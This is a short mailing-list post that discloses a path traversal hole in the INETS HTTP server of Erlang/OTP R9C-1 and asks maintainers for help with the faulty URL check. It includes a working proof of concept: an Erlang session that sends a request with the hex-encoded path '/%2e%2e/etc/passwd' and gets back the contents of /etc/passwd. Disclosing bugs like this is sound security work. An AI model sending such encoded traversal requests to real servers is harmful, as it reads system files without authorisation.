INETS security hole (you can escape from the document root)

[Matthias Lang]

Hi,

INETS, the HTTP server included in the OTP (R9C-1, but probably all
versions) has a security hole. URLs are not properly scrutinised for
relative paths. A malicious user can exploit this to read files
outside the document root.

Example:

    ~ >cd /tmp
    tmp >mkdir logs
    tmp >ln -s . conf
    tmp >cat > httpd.conf
    Port 8888
    ServerName antilipe.corelatus.com
    SocketType ip_comm
    Modules mod_get
    ServerRoot /tmp
    DocumentRoot /tmp
    tmp >erl
    Erlang (BEAM) emulator version 5.3.6.2 [source] [hipe]
    
    Eshell V5.3.6.2  (abort with ^G)
    1> httpd:start("/tmp/httpd.conf").
    {ok,<0.42.0>}
    2> {ok, S} = gen_tcp:connect("localhost", 8888, []).     
    {ok,#Port<0.101>}
    3>     
    3> gen_tcp:send(S, "GET /%2e%2e/etc/passwd HTTP/1.0\r\n\r\n").
    ok
    4> flush().
    Shell got {tcp,#Port<0.101>,
                   "HTTP/1.1 200 OK 
                    ....
                    root:x:0:0:root:/root:/bin/bash
                    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
                    bin:x:2:2:bin:/bin:/bin/sh
                    ...

The problem is in httpd_parse:verify_request. That function is
supposed to reject URLs with '..' in them, but it fails to reject those
cases where the '..' is encoded fully or partially in hex.

But httpd_parse:verify_request seems broken by design. For instance,
it also rejects URLs which don't actually involve relative
directories, such as

  /bla..ha

As far as I can tell, RFC1738 allows '..' in HTTP URLs.

Does anyone feel familar with that code? Johan?

Matthias